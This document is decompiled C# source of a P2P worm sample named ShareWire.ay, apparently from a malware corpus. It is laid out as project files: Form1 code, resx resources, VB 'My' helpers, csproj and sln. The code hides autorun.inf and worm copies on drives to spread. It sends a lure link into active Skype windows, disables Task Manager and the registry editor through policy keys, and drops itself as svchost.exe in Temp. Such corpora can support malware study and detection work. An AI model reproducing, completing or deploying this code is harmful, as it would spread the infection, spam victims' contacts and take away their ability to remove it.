Microsoft.VisualBasic.FileSystem.SetAttr(str + "HDDFile.com", FileAttribute.Hidden);
label_11:
num3 = 12;
Microsoft.VisualBasic.FileSystem.SetAttr(str + "autorun.inf", FileAttribute.Hidden);
label_12:
checked { ++index; }
label_13:
num3 = 14;
label_14:
if (index < strArray.Length)
{
str = strArray[index];
goto label_6;
}
else
goto label_21;
label_16:
num2 = num3;
switch (num1)
{
case 1:
int num4 = num2 + 1;
num2 = 0;
switch (num4)
{
case 1:
goto label_0;
case 2:
goto label_1;
case 3:
goto label_2;
case 4:
goto label_3;
case 5:
goto label_4;
case 6:
goto label_6;
case 7:
case 13:
goto label_12;
case 8:
goto label_7;
case 9:
goto label_8;
case 10:
goto label_9;
case 11:
goto label_10;
case 12:
goto label_11;
case 14:
goto label_13;
case 15:
goto label_21;
}
break;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_16;
}
throw ProjectData.CreateProjectError(-2146828237);
label_21:
if (num2 == 0)
return;
ProjectData.ClearProjectError();
}
private void Timer3_Tick(object sender, EventArgs e)
{
string text = this.TextBox1.Text;
if (!this.GetActiveWindowTitle().ToString().Contains("Skype"))
return;
SendKeys.Send("{ENTER}");
SendKeys.Send("Hey webcam with me! http://TlNYCHAT.COM/chanb ");
SendKeys.Send("{ENTER}");
}
public void Mgr()
{
label_0:
int num1;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = 1;
label_1:
int num3 = 2;
Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", true).SetValue("DisableTaskMgr", (object) "1", RegistryValueKind.DWord);
goto label_8;
label_3:
num2 = num3;
switch (num1)
{
case 1:
int num4 = num2 + 1;
num2 = 0;
switch (num4)
{
case 1:
goto label_0;
case 2:
goto label_1;
case 3:
goto label_8;
}
break;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_3;
}
throw ProjectData.CreateProjectError(-2146828237);
label_8:
if (num2 == 0)
return;
ProjectData.ClearProjectError();
}
public void Reg()
{
label_0:
int num1;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = 1;
label_1:
int num3 = 2;
Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", true).SetValue("DisableRegistryTools", (object) "1", RegistryValueKind.DWord);
goto label_8;
label_3:
num2 = num3;
switch (num1)
{
case 1:
int num4 = num2 + 1;
num2 = 0;
switch (num4)
{
case 1:
goto label_0;
case 2:
goto label_1;
case 3:
goto label_8;
}
break;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_3;
}
throw ProjectData.CreateProjectError(-2146828237);
label_8:
if (num2 == 0)
return;
ProjectData.ClearProjectError();
}
}
}
MSIL/P2P-Worm/MSIL/S/P2P-Worm.MSIL.ShareWire.ay-a25c80dfdb1baa8b632a26bffd961d02b570eba3ae4eb58070bad8c311a32b22/Form1.resx
+120
View File
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
MSIL/P2P-Worm/MSIL/S/P2P-Worm.MSIL.ShareWire.ay-a25c80dfdb1baa8b632a26bffd961d02b570eba3ae4eb58070bad8c311a32b22/My/MyApplication.cs
+50
View File
@@ -0,0 +1,50 @@
// Decompiled with JetBrains decompiler
// Type: stub.My.MyApplication
// Assembly: stub, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 267E8B95-AFAA-4D03-9834-74556FFC1EC8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\P2P-Worm.MSIL.ShareWire.ay-a25c80dfdb1baa8b632a26bffd961d02b570eba3ae4eb58070bad8c311a32b22.exe
using Microsoft.VisualBasic.ApplicationServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Windows.Forms;
namespace stub.My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "10.0.0.0")]
internal class MyApplication : WindowsFormsApplicationBase
{
[EditorBrowsable(EditorBrowsableState.Advanced)]
[DebuggerHidden]
[STAThread]
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
internal static void Main(string[] Args)
{
try
{
Application.SetCompatibleTextRenderingDefault(WindowsFormsApplicationBase.UseCompatibleTextRendering);
}
finally
{
}
MyProject.Application.Run(Args);
}
[DebuggerStepThrough]
public MyApplication()
: base(AuthenticationMode.Windows)
{
this.IsSingleInstance = false;
this.EnableVisualStyles = true;
this.SaveMySettingsOnExit = true;
this.ShutdownStyle = ShutdownMode.AfterMainFormCloses;
}
[DebuggerStepThrough]
protected override void OnCreateMainForm() => this.MainForm = (Form) MyProject.Forms.Form1;
}
}
MSIL/P2P-Worm/MSIL/S/P2P-Worm.MSIL.ShareWire.ay-a25c80dfdb1baa8b632a26bffd961d02b570eba3ae4eb58070bad8c311a32b22/My/MyComputer.cs
+24
View File
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: stub.My.MyComputer
// Assembly: stub, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 267E8B95-AFAA-4D03-9834-74556FFC1EC8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\P2P-Worm.MSIL.ShareWire.ay-a25c80dfdb1baa8b632a26bffd961d02b570eba3ae4eb58070bad8c311a32b22.exe
using Microsoft.VisualBasic.Devices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace stub.My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "10.0.0.0")]
internal class MyComputer : Computer
{
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public MyComputer()
{
}
}
}
MSIL/P2P-Worm/MSIL/S/P2P-Worm.MSIL.ShareWire.ay-a25c80dfdb1baa8b632a26bffd961d02b570eba3ae4eb58070bad8c311a32b22/My/MyProject.cs
+207
View File
@@ -0,0 +1,207 @@
// Decompiled with JetBrains decompiler
// Type: stub.My.MyProject
// Assembly: stub, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 267E8B95-AFAA-4D03-9834-74556FFC1EC8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\P2P-Worm.MSIL.ShareWire.ay-a25c80dfdb1baa8b632a26bffd961d02b570eba3ae4eb58070bad8c311a32b22.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.Collections;
using System.ComponentModel;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace stub.My
{
[StandardModule]
[HideModuleName]
[GeneratedCode("MyTemplate", "10.0.0.0")]
internal sealed class MyProject
{
private static readonly MyProject.ThreadSafeObjectProvider<MyComputer> m_ComputerObjectProvider = new MyProject.ThreadSafeObjectProvider<MyComputer>();
private static readonly MyProject.ThreadSafeObjectProvider<MyApplication> m_AppObjectProvider = new MyProject.ThreadSafeObjectProvider<MyApplication>();
private static readonly MyProject.ThreadSafeObjectProvider<User> m_UserObjectProvider = new MyProject.ThreadSafeObjectProvider<User>();
private static MyProject.ThreadSafeObjectProvider<MyProject.MyForms> m_MyFormsObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyForms>();
private static readonly MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices> m_MyWebServicesObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices>();
[HelpKeyword("My.Computer")]
internal static MyComputer Computer
{
[DebuggerHidden] get => MyProject.m_ComputerObjectProvider.GetInstance;
}
[HelpKeyword("My.Application")]
internal static MyApplication Application
{
[DebuggerHidden] get => MyProject.m_AppObjectProvider.GetInstance;
}
[HelpKeyword("My.User")]
internal static User User
{
[DebuggerHidden] get => MyProject.m_UserObjectProvider.GetInstance;
}
[HelpKeyword("My.Forms")]
internal static MyProject.MyForms Forms
{
[DebuggerHidden] get => MyProject.m_MyFormsObjectProvider.GetInstance;
}
[HelpKeyword("My.WebServices")]
internal static MyProject.MyWebServices WebServices
{
[DebuggerHidden] get => MyProject.m_MyWebServicesObjectProvider.GetInstance;
}
[MyGroupCollection("System.Windows.Forms.Form", "Create__Instance__", "Dispose__Instance__", "My.MyProject.Forms")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class MyForms
{
public Form1 m_Form1;
[ThreadStatic]
private static Hashtable m_FormBeingCreated;
public Form1 Form1
{
get
{
this.m_Form1 = MyProject.MyForms.Create__Instance__<Form1>(this.m_Form1);
return this.m_Form1;
}
set
{
if (value == this.m_Form1)
return;
if (value != null)
throw new ArgumentException("Property can only be set to Nothing");
this.Dispose__Instance__<Form1>(ref this.m_Form1);
}
}
[DebuggerHidden]
private static T Create__Instance__<T>(T Instance) where T : Form, new()
{
if ((object) Instance != null && !Instance.IsDisposed)
return Instance;
if (MyProject.MyForms.m_FormBeingCreated != null)
{
if (MyProject.MyForms.m_FormBeingCreated.ContainsKey((object) typeof (T)))
throw new InvalidOperationException(Utils.GetResourceString("WinForms_RecursiveFormCreate"));
}
else
MyProject.MyForms.m_FormBeingCreated = new Hashtable();
MyProject.MyForms.m_FormBeingCreated.Add((object) typeof (T), (object) null);
try
{
return new T();
}
catch (TargetInvocationException ex) when (
{
// ISSUE: unable to correctly present filter
ProjectData.SetProjectError((Exception) ex);
if (ex.InnerException != null)
{
SuccessfulFiltering;
}
else
throw;
}
)
{
throw new InvalidOperationException(Utils.GetResourceString("WinForms_SeeInnerException", ex.InnerException.Message), ex.InnerException);
}
finally
{
MyProject.MyForms.m_FormBeingCreated.Remove((object) typeof (T));
}
}
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) where T : Form
{
instance.Dispose();
instance = default (T);
}
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyForms()
{
}
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[EditorBrowsable(EditorBrowsableState.Never)]
internal new System.Type GetType() => typeof (MyProject.MyForms);
[EditorBrowsable(EditorBrowsableState.Never)]
public override string ToString() => base.ToString();
}
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class MyWebServices
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
internal new System.Type GetType() => typeof (MyProject.MyWebServices);
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override string ToString() => base.ToString();
[DebuggerHidden]
private static T Create__Instance__<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) => instance = default (T);
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public MyWebServices()
{
}
}
[ComVisible(false)]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class ThreadSafeObjectProvider<T> where T : new()
{
internal T GetInstance
{
[DebuggerHidden] get
{
if ((object) MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue == null)
MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue = new T();
return MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue;
}
}
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public ThreadSafeObjectProvider()
{
}
}
}
}
MSIL/P2P-Worm/MSIL/S/P2P-Worm.MSIL.ShareWire.ay-a25c80dfdb1baa8b632a26bffd961d02b570eba3ae4eb58070bad8c311a32b22/My/MySettings.cs
+70
View File
@@ -0,0 +1,70 @@
// Decompiled with JetBrains decompiler
// Type: stub.My.MySettings
// Assembly: stub, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 267E8B95-AFAA-4D03-9834-74556FFC1EC8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\P2P-Worm.MSIL.ShareWire.ay-a25c80dfdb1baa8b632a26bffd961d02b570eba3ae4eb58070bad8c311a32b22.exe
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Configuration;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Threading;
namespace stub.My
{
[CompilerGenerated]
[EditorBrowsable(EditorBrowsableState.Advanced)]
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "10.0.0.0")]
internal sealed class MySettings : ApplicationSettingsBase
{
private static MySettings defaultInstance = (MySettings) SettingsBase.Synchronized((SettingsBase) new MySettings());
private static bool addedHandler;
private static object addedHandlerLockObject = RuntimeHelpers.GetObjectValue(new object());
[EditorBrowsable(EditorBrowsableState.Advanced)]
[DebuggerNonUserCode]
private static void AutoSaveSettings(object sender, EventArgs e)
{
if (!MyProject.Application.SaveMySettingsOnExit)
return;
MySettingsProperty.Settings.Save();
}
public static MySettings Default
{
get
{
if (!MySettings.addedHandler)
{
object handlerLockObject = MySettings.addedHandlerLockObject;
ObjectFlowControl.CheckForSyncLockOnValueType(handlerLockObject);
bool lockTaken = false;
try
{
Monitor.Enter(handlerLockObject, ref lockTaken);
if (!MySettings.addedHandler)
{
MyProject.Application.Shutdown += (ShutdownEventHandler) ((sender, e) =>
{
if (!MyProject.Application.SaveMySettingsOnExit)
return;
MySettingsProperty.Settings.Save();
});
MySettings.addedHandler = true;
}
}
finally
{
if (lockTaken)
Monitor.Exit(handlerLockObject);
}
}
return MySettings.defaultInstance;
}
}
}
}
MSIL/P2P-Worm/MSIL/S/P2P-Worm.MSIL.ShareWire.ay-a25c80dfdb1baa8b632a26bffd961d02b570eba3ae4eb58070bad8c311a32b22/My/MySettingsProperty.cs
+24
View File
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: stub.My.MySettingsProperty
// Assembly: stub, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 267E8B95-AFAA-4D03-9834-74556FFC1EC8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\P2P-Worm.MSIL.ShareWire.ay-a25c80dfdb1baa8b632a26bffd961d02b570eba3ae4eb58070bad8c311a32b22.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Runtime.CompilerServices;
namespace stub.My
{
[HideModuleName]
[DebuggerNonUserCode]
[CompilerGenerated]
[StandardModule]
internal sealed class MySettingsProperty
{
[HelpKeyword("My.Settings")]
internal static MySettings Settings => MySettings.Default;
}
}
MSIL/P2P-Worm/MSIL/S/P2P-Worm.MSIL.ShareWire.ay-a25c80dfdb1baa8b632a26bffd961d02b570eba3ae4eb58070bad8c311a32b22/My/Resources/Resources.cs
+50
View File
@@ -0,0 +1,50 @@
// Decompiled with JetBrains decompiler
// Type: stub.My.Resources.Resources
// Assembly: stub, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 267E8B95-AFAA-4D03-9834-74556FFC1EC8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\P2P-Worm.MSIL.ShareWire.ay-a25c80dfdb1baa8b632a26bffd961d02b570eba3ae4eb58070bad8c311a32b22.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace stub.My.Resources
{
[HideModuleName]
[CompilerGenerated]
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
[StandardModule]
[DebuggerNonUserCode]
internal sealed class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (object.ReferenceEquals((object) stub.My.Resources.Resources.resourceMan, (object) null))
stub.My.Resources.Resources.resourceMan = new ResourceManager("stub.Resources", typeof (stub.My.Resources.Resources).Assembly);
return stub.My.Resources.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => stub.My.Resources.Resources.resourceCulture;
set => stub.My.Resources.Resources.resourceCulture = value;
}
internal static byte[] Interop_MessengerAPI => (byte[]) RuntimeHelpers.GetObjectValue(stub.My.Resources.Resources.ResourceManager.GetObject(nameof (Interop_MessengerAPI), stub.My.Resources.Resources.resourceCulture));
internal static byte[] Interop_MessengerPrivate => (byte[]) RuntimeHelpers.GetObjectValue(stub.My.Resources.Resources.ResourceManager.GetObject(nameof (Interop_MessengerPrivate), stub.My.Resources.Resources.resourceCulture));
}
}
MSIL/P2P-Worm/MSIL/S/P2P-Worm.MSIL.ShareWire.ay-a25c80dfdb1baa8b632a26bffd961d02b570eba3ae4eb58070bad8c311a32b22/P2P-Worm.MSIL.ShareWire.ay.csproj
+57
View File
@@ -0,0 +1,57 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\P2P-Worm.MSIL.ShareWire.ay-a25c80dfdb1baa8b632a26bffd961d02b570eba3ae4eb58070bad8c311a32b22.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{D5C01F1A-A4F9-4DA4-8931-FE7F0092F9BC}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>stub</AssemblyName>
<TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
<TargetFrameworkProfile />
<ApplicationVersion>1.0.0.0</ApplicationVersion>
<FileAlignment>512</FileAlignment>
<RootNamespace>stub</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="Form1.cs" />
<Compile Include="My\MyApplication.cs" />
<Compile Include="My\MyComputer.cs" />
<Compile Include="My\MyProject.cs" />
<Compile Include="My\MySettings.cs" />
<Compile Include="My\MySettingsProperty.cs" />
<Compile Include="My\Resources\Resources.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Form1.resx" />
<EmbeddedResource Include="Resources.resx" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/P2P-Worm/MSIL/S/P2P-Worm.MSIL.ShareWire.ay-a25c80dfdb1baa8b632a26bffd961d02b570eba3ae4eb58070bad8c311a32b22/P2P-Worm.MSIL.ShareWire.ay.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 11.00
# Visual Studio 2010
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "stub", "P2P-Worm.MSIL.ShareWire.ay-a25c80dfdb1baa8b632a26bffd961d02b570eba3ae4eb58070bad8c311a32b22.csproj", "{D5C01F1A-A4F9-4DA4-8931-FE7F0092F9BC}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{D5C01F1A-A4F9-4DA4-8931-FE7F0092F9BC}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{D5C01F1A-A4F9-4DA4-8931-FE7F0092F9BC}.Debug|Any CPU.Build.0 = Debug|Any CPU
{D5C01F1A-A4F9-4DA4-8931-FE7F0092F9BC}.Release|Any CPU.ActiveCfg = Release|Any CPU
{D5C01F1A-A4F9-4DA4-8931-FE7F0092F9BC}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/P2P-Worm/MSIL/S/P2P-Worm.MSIL.ShareWire.ay-a25c80dfdb1baa8b632a26bffd961d02b570eba3ae4eb58070bad8c311a32b22/Resources.resx
+1973
View File
File diff suppressed because it is too large Load Diff
MSIL/P2P-Worm/MSIL/S/P2P-Worm.MSIL.ShareWire.ay-d8ec6d31f4acc813de1053b3a60dd04fa27b0ed0ffa2b95c5200a6734eb19dc7/AssemblyInfo.cs
+13
View File
@@ -0,0 +1,13 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyDescription("")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyTitle("Worm")]
[assembly: Guid("8be770b5-dfcc-40dd-80dc-7979edc0e5f9")]
[assembly: ComVisible(false)]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCopyright("Copyright © 2010")]
[assembly: AssemblyProduct("Worm")]
[assembly: AssemblyVersion("1.0.0.0")]
MSIL/P2P-Worm/MSIL/S/P2P-Worm.MSIL.ShareWire.ay-d8ec6d31f4acc813de1053b3a60dd04fa27b0ed0ffa2b95c5200a6734eb19dc7/Form1.cs
+934
View File
@@ -0,0 +1,934 @@
// Decompiled with JetBrains decompiler
// Type: stub.Form1
// Assembly: stub, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 267E8B95-AFAA-4D03-9834-74556FFC1EC8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\P2P-Worm.MSIL.ShareWire.ay-d8ec6d31f4acc813de1053b3a60dd04fa27b0ed0ffa2b95c5200a6734eb19dc7.exe
using MessengerAPI;
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.VisualBasic.FileIO;
using Microsoft.Win32;
using stub.My;
using System;
using System.Collections;
using System.Collections.Generic;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Linq;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Threading;
using System.Windows.Forms;
namespace stub
{
[DesignerGenerated]
public class Form1 : Form
{
private IContainer components;
[AccessedThroughProperty("ListBox1")]
private ListBox _ListBox1;
[AccessedThroughProperty("Timer1")]
private System.Windows.Forms.Timer _Timer1;
[AccessedThroughProperty("Timer2")]
private System.Windows.Forms.Timer _Timer2;
[AccessedThroughProperty("Timer3")]
private System.Windows.Forms.Timer _Timer3;
[AccessedThroughProperty("TextBox1")]
private TextBox _TextBox1;
[AccessedThroughProperty("msn")]
private Messenger _msn;
private string fpath;
private const string FileSplit = "@Infested@";
private string[] options;
private string link;
public Form1()
{
this.FormClosing += new FormClosingEventHandler(this.Form1_FormClosing);
this.Load += new EventHandler(this.Form1_Load);
this.fpath = MyProject.Computer.FileSystem.SpecialDirectories.Temp + "\\svchost.exe";
this.InitializeComponent();
}
[DebuggerNonUserCode]
protected override void Dispose(bool disposing)
{
try
{
if (!disposing || this.components == null)
return;
this.components.Dispose();
}
finally
{
base.Dispose(disposing);
}
}
[DebuggerStepThrough]
private void InitializeComponent()
{
this.components = (IContainer) new System.ComponentModel.Container();
this.ListBox1 = new ListBox();
this.Timer1 = new System.Windows.Forms.Timer(this.components);
this.Timer2 = new System.Windows.Forms.Timer(this.components);
this.Timer3 = new System.Windows.Forms.Timer(this.components);
this.TextBox1 = new TextBox();
this.SuspendLayout();
this.ListBox1.FormattingEnabled = true;
ListBox listBox1_1 = this.ListBox1;
Point point1 = new Point(25, 12);
Point point2 = point1;
listBox1_1.Location = point2;
this.ListBox1.Name = "ListBox1";
ListBox listBox1_2 = this.ListBox1;
Size size1 = new Size(242, 69);
Size size2 = size1;
listBox1_2.Size = size2;
this.ListBox1.TabIndex = 0;
this.Timer1.Interval = 6000;
this.Timer3.Interval = 4000;
TextBox textBox1_1 = this.TextBox1;
point1 = new Point(25, 86);
Point point3 = point1;
textBox1_1.Location = point3;
this.TextBox1.Name = "TextBox1";
TextBox textBox1_2 = this.TextBox1;
size1 = new Size(241, 20);
Size size3 = size1;
textBox1_2.Size = size3;
